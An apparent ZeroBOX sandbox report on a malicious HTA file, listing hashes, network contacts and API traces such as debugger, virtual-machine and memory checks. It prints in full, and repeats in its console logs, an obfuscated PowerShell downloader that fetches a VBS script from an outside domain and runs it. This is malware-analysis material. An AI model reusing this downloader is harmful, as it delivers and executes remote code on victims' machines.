Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Feb. 3, 2025, 9:44 a.m.	Feb. 3, 2025, 9:49 a.m.

Size	31.2KB
Type	HTML document, ASCII text, with very long lines
MD5	`3765f5e3fc9bd26f39b92ea55cdd57c3`
SHA256	`851c1678aba9d222fc34bf56bbdf5e4018d9e0937b2b8b75a4269da92e6fbc8c`
CRC32	`76CBD2DF`
ssdeep	`384:yXtAysbi3UKk+dxH97SNRMNsCx8sXoqw85RHEPSByYn4BYN+vR9/YEkiAlr266g3:eAy6GVk+dOazdtFPEY0yl6gsmfV7`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\today.hta
1156
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu;
  316

Name	Response	Post-Analysis Lookup
myfileview1.com	A 195.66.213.164	195.66.213.164

IP Address	Status	Action
164.124.101.2	Active	Moloch
195.66.213.164	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Feb. 3, 2025, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 3, 2025, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 3, 2025, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 3, 2025, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 3, 2025, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 3, 2025, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 3, 2025, 9:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 3, 2025, 9:44 a.m.			0	0

Command line console output was observed (50 out of 68 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: At line:1 char:405 console_handle: 0x00000053	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: )};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $Tr console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: ue){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDU console_handle: 0x00000077	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: WveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Obje console_handle: 0x00000083	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: ct (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePoin console_handle: 0x0000008f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: tManager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg console_handle: 0x0000009b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYto console_handle: 0x000000a7	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: mjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYt console_handle: 0x000000b3	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: omjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(39 console_handle: 0x000000bf	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: 93,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA console_handle: 0x000000d7	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: $h $M;O $h;;;;}Lbu; console_handle: 0x000000e3	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000000ef	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x000000fb	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th console_handle: 0x0000011b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: e remote server" console_handle: 0x00000127	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: At line:1 char:491 console_handle: 0x00000133	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg console_handle: 0x0000013f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: )};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $Tr console_handle: 0x0000014b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: ue){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDU console_handle: 0x00000157	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: WveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Obje console_handle: 0x00000163	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: ct (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePoin console_handle: 0x0000016f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: tManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUy console_handle: 0x0000017b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: crAxw.DownloadData <<<< ($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYto console_handle: 0x00000187	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: mjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYt console_handle: 0x00000193	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: omjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(39 console_handle: 0x0000019f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: 93,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA console_handle: 0x000001b7	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: $h $M;O $h;;;;}Lbu; console_handle: 0x000001c3	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001cf	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001db	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. console_handle: 0x000001fb	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: Parameter name: bytes" console_handle: 0x00000207	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: At line:1 char:58 console_handle: 0x00000213	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes <<<< ($iBDUWveK, $k console_handle: 0x0000021f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: acHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) - console_handle: 0x0000022b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) console_handle: 0x00000237	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = Ne console_handle: 0x00000243	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: w-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.Servi console_handle: 0x0000024f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: cePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg console_handle: 0x0000025b	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYto console_handle: 0x00000267	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: mjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYt console_handle: 0x00000273	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: omjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(39 console_handle: 0x0000027f	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: 93,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA console_handle: 0x00000297	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: $h $M;O $h;;;;}Lbu; console_handle: 0x000002a3	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000002af	1	1
WriteConsoleW Feb. 3, 2025, 9:44 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000002bb	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003035a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303de0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003039a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303f20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 3, 2025, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00303e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 3, 2025, 9:44 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 166 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02680000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
